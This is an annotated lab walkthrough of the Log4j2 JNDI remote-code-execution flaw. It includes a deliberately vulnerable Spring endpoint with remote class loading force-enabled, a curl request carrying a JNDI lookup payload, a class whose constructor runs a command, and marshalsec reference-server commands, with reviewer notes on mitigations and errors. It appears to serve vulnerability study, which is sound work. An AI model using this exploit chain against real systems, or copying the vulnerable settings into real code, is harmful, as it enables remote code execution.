// NOTE(review): this is a deliberately vulnerable lab listing (vulfocus image
// "log4j2-rce-2021-12-09"), re-flowed here from a single collapsed PDF-extraction line.
// It reproduces the Log4j2 JNDI-lookup RCE disclosed in December 2021 (presumably
// CVE-2021-44228 / "Log4Shell" — the docker tag dates it). Never deploy any of this.
// Mitigation is upgrading log4j-core (2.15.0 disabled the lookup by default, 2.16.0
// removed message lookups, 2.17.1 is the commonly cited fix line — confirm the version
// pinned in this lab's pom, which is not shown here).
//
// 1. Start the vulnerable target:
//
//   docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest
//
// 2. The target application.

@SpringBootApplication
@RestController
public class Log4j2RceApplication {
    private static final Logger logger = LogManager.getLogger(Log4j2RceApplication.class);

    public Log4j2RceApplication() {
    }

    public static void main(String[] args) {
        SpringApplication.run(Log4j2RceApplication.class, args);
    }

    /**
     * Vulnerable endpoint: logs the attacker-controlled form field {@code payload} verbatim
     * through log4j, so a {@code ${jndi:...}} lookup in it is resolved by the server.
     *
     * @param payload untrusted request parameter; it is never validated or escaped here
     * @return the literal string "ok" regardless of what was logged
     */
    @PostMapping({"/hello"})
    public String hello(String payload) {
        // Re-enable remote class loading from JNDI references on every request. Recent JDKs
        // default both properties to "false" (TODO confirm the exact JDK versions), which would
        // block the reference-based payload in step 3; the lab force-enables them so the
        // exploit works regardless of the runtime. A real application must never do this.
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        // Four sinks on purpose: on a vulnerable log4j-core the lookup is evaluated on the
        // formatted message, so the parameterized ("{}") and direct forms are both exploitable.
        logger.error("{}", payload);
        logger.info("{}", payload);
        logger.info(payload);
        logger.error(payload);
        return "ok";
    }
}

// 3. Trigger. The "payload" form field carries the JNDI lookup; port 1099 must match the
//    RMI reference server started in step 5. The two trailing empty "--data =" fragments
//    are extraction residue in the original listing and can be dropped:
//
//   curl --request POST \
//     --url http://localhost:8080/hello \
//     --header 'Content-Type: application/x-www-form-urlencoded' \
//     --data 'payload=${jndi:rmi://localhost:1099/ExecTest}' \
//     --data = \
//     --data =
//
// 4. The class the JNDI reference resolves to. Its no-arg constructor runs when the target
//    instantiates the remotely loaded class — that constructor IS the code execution.
//    "calc.exe" is a Windows-only demo payload; swallowing the exception with
//    printStackTrace() is PoC style, not something to copy.

public class ExecTest {
    public ExecTest() {
        try {
            System.out.println("You're Hacked!!!");
            Runtime.getRuntime().exec("calc.exe");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

// 5. Serve the compiled class over HTTP and run a JNDI reference server
//    (the original text here reads "use RMI"):
//
//   cd target/classes
//   python3 -m SimpleHTTPServer
//
// NOTE(review): SimpleHTTPServer is the Python 2 module name; under python3 this command
//   fails with "No module named SimpleHTTPServer". Use `python3 -m http.server 8000` —
//   port 8000 is what the RMIRefServer codebase URL below points at.
//
//   mvn clean package -D"maven.test.skip"=true
//   java -cp .\marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://localhost:8000/#ExecTest
//   # java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/\#ExecTest 1389
//
// NOTE(review): the commented-out LDAP variant points its codebase at localhost:8080, which is
//   the Spring app's own port rather than the class-serving HTTP server on 8000; this looks
//   like a copy error in the original — confirm before using the LDAP path.

